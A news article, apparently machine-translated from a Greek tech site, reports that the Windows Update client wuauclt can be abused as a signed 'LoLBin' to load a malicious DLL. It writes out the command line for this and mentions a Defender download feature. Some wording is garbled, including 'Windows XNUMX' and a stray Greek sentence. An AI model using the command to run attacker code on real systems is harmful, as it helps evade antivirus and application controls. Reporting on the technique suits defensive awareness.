Windows Update: may run malicious programs

LoLBins are executable with a Microsoft signature (preinstalled or downloaded) that can prevent malware from being detected when downloading, installing, or running malicious code.

They can also be used by attackers in their attempts to bypass Windows User Account Control (UAC) or Windows Defender Application Control (WDAC) and gain access to already compromised systems.

WSUS / Windows Update client (wuauclt) is a utility located in % windir% \\ system32 \\ which gives users some control over some of the of the Windows Update Agent from the line .

Allows you to check for new updates and install them without having to use the Windows user interface, but instead enable them from a command prompt window.

The use of choice  ResetAuthorization Allows you to start a manual update check either on the locally configured WSUS server or through the Microsoft Update service according to Microsoft.

However, MDSec researcher David Middlehurst has discovered that wuauclt can also be used by attackers to execute malicious code on Windows 10 systems by loading it from a specially designed malicious DLL with the following command line options:

wuauclt.exe / UpdateDeploymentProvider [path_to_dll] / RunHandlerComServer

As shown above screenshot, Full_Path_To_DLL is the absolute path to the attacker's specially crafted DLL file that would execute code in the attach.

This technique is categorized by MITER ATT \ CK as running a binary proxy through Rundll32 and allows intruders to bypass the antivirus program, scan applications, and validate digital certificates.

In this case, it does this by running malicious code from a DLL that was loaded using a Microsoft-signed binary, Windows Update (wuauclt).

Αφού ανακάλυψε ότι το wuauclt μπορεί επίσης να χρησιμοποιηθεί ως LoLBin, ο Middlehurst βρήκε επίσης ένα δείγμα που το χρησιμοποίησε για online .

Microsoft recently updated its Microsoft 10 Defender antivirus solution to Windows XNUMX by quietly adding a (potentially malicious) way to download files to Windows devices.

Microsoft later removed this feature from MpCmdRun.exe (the Microsoft Antimalware utility Line Line).

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.100 registrants.

Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).